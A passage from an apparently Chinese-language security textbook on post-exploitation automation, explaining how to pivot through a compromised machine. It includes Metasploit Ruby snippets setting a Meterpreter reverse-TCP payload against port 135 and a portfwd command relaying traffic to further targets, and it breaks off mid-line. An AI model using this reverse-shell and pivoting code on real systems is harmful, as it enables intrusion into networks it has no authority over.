28、后渗透自动化与语音、网络流量检测技术解析

后渗透自动化与语音、网络流量检测技术解析

1. 后渗透自动化中的跳板集成

在某些情况下，我们无法直接访问目标。为了利用这类目标，需要先攻破另一台机器，然后通过在被攻破的机器上执行跳板操作，就有可能开始攻击那些无法直接访问的其他机器。

1.1 脚本配置要求

独立脚本能够满足这一需求。配置文件应包含超过 5 行内容（前 5 行是第一台机器的设置）。每额外的 5 行表示一台需要通过第一台机器进行攻击的其他机器。

1.2 跳板方法及代码实现

使用的跳板方法是 Meterpreter 有效负载的端口转发功能。以下代码使用了一个利用 TCP 端口 135 的漏洞利用程序，但原始脚本会动态查找端口：

'Payload' => 'windows/meterpreter/reverse_tcp',
'OptionStr' => 'RHOST=127.0.0.1 RPORT=135 LHOST='+MyPublicAddress+' LPORT='+MyTcpPort.to_s

这个有效负载是一个反向 shell，在攻破远程机器后，它会连接回攻击者的主机。攻击者需要定义一个端口转发器，以便能够与远程机器进行通信，具体代码如下：

myStr='portfwd add -L 127.0.0.1 -l 135 -r '+$myTarget[i+1].to_s+' -p 135'
puts myStr
portFwdResult = $session[0].